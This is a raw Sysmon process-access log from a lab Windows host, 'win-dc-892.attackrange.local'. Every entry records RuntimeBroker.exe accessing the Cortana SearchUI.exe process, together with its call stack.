12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245876C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246096C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245876C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245752C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245752C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49242684C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
